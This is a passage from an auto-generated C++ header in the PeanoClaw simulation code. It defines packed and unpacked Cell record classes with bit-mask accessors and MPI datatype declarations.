__attribute__((always_inline)) #endif { return _persistentRecords._numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfStoresToOutputStream = numberOfStoresToOutputStream; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ CellPacked convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifndef DaStGenPackedPadding #define DaStGenPackedPadding 1 // 32 bit version // #define DaStGenPackedPadding 2 // 64 bit version #endif #ifdef PackedRecords #pragma pack (push, DaStGenPackedPadding) #endif /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::CellPacked { public: typedef peanoclaw::records::Cell::State State; struct PersistentRecords { int _cellDescriptionIndex; tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; int _numberOfLoadsFromInputStream; int _numberOfStoresToOutputStream; /** mapping of records: || Member || startbit || length | isInside | startbit 0 | #bits 1 | state | startbit 1 | #bits 2 | evenFlags | startbit 3 | #bits DIMENSIONS */ short int _packedRecords0; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _packedRecords0 = static_cast<short int>( isInside ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | state << (1)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | evenFlags.to_ulong() << (3)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfStoresToOutputStream = numberOfStoresToOutputStream; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ CellPacked(); /** * Generated */ CellPacked(const PersistentRecords& persistentRecords); /** * Generated */ CellPacked(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); /** * Generated */ virtual ~CellPacked(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _persistentRecords._packedRecords0 = static_cast<short int>( isInside ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | state << (1)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | evenFlags.to_ulong() << (3)); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; return (_persistentRecords._packedRecords0& mask); } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); assertion(!evenFlags || evenFlags==1); int shift = 3 + elementIndex; int mask = 1 << (shift); int shiftedValue = evenFlags << (shift); _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 & ~mask; _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 | shiftedValue; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; _persistentRecords._packedRecords0^= mask; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfStoresToOutputStream = numberOfStoresToOutputStream; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ Cell convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifdef PackedRecords #pragma pack (pop) #endif #elif !defined(Parallel) && defined(Debug) && !defined(SharedMemoryParallelisation) /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::Cell { public: typedef peanoclaw::records::CellPacked Packed; enum State { Leaf = 0, Refined = 1, Root = 2 }; struct PersistentRecords { int _cellDescriptionIndex; bool _isInside; State _state; int _level; #ifdef UseManualAlignment std::bitset<DIMENSIONS> _evenFlags __attribute__((aligned(VectorisationAlignment))); #else std::bitset<DIMENSIONS> _evenFlags; #endif #ifdef UseManualAlignment tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber __attribute__((aligned(VectorisationAlignment))); #else tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; #endif /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _state = state; } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _evenFlags = (evenFlags); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ Cell(); /** * Generated */ Cell(const PersistentRecords& persistentRecords); /** * Generated */ Cell(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber); /** * Generated */ virtual ~Cell(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._state = state; } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._evenFlags = (evenFlags); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); return _persistentRecords._evenFlags[elementIndex]; } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags[elementIndex]= evenFlags; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags.flip(elementIndex); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ CellPacked convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifndef DaStGenPackedPadding #define DaStGenPackedPadding 1 // 32 bit version // #define DaStGenPackedPadding 2 // 64 bit version #endif #ifdef PackedRecords #pragma pack (push, DaStGenPackedPadding) #endif /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::CellPacked { public: typedef peanoclaw::records::Cell::State State; struct PersistentRecords { int _cellDescriptionIndex; int _level; tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; /** mapping of records: || Member || startbit || length | isInside | startbit 0 | #bits 1 | state | startbit 1 | #bits 2 | evenFlags | startbit 3 | #bits DIMENSIONS */ short int _packedRecords0; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _packedRecords0 = static_cast<short int>( isInside ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | state << (1)); } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for 